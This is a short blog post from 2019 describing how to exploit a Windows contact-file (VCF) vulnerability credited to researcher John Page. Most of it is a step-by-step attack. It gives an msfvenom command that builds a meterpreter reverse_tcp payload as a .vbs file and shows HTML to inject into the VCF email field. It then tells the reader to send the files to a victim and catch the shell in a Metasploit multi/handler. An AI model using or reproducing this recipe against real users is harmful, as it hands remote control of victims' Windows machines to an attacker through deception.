Saturday, 2 February 2019

Exploiting Windows using malicious VCF file

John Page a cyber security researcher brought this vulnerability, which was a 0 day exploit working on latest windows 10 too.

Introduction: He discovered that if we replace the website in a VCF file with the local path of a ".cpl" file, it tends to install that file instead of opening it on browser. This is done by replacing "http://" with "http.\\" or we can also inject some html in email field to do same and when user clicks on it we get a shell. (This exploit uses human interaction)

Proof Of Concept:

1.   We need to create a simple payload. ( I used msfvenom and selected format as ".vbs")
       msfvenom -p windows/meterpreter/reverse_tcp lhost=<IP> lport=<lport> -f vbs > <file_name>.vbs

2.   Inject html with href value to payload file name inside email field (Both files present in same folder). And save the file
      <a href="shell.vbs"></a>

3.   Now we have to send this folder to the victim.

4.   Set up multi/handler with proper options in metasploit and wait for victim to click on link

5.   When user clicks on link we get a shell.

This exploit needs user interaction although its a 0 day. Post your comments below, Thanks for reading.

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Exploiting Windows using malicious VCF file

John Page a cyber security researcher brought this vulnerability, which was a 0 day exploit working on latest windows 10 too. Introductio...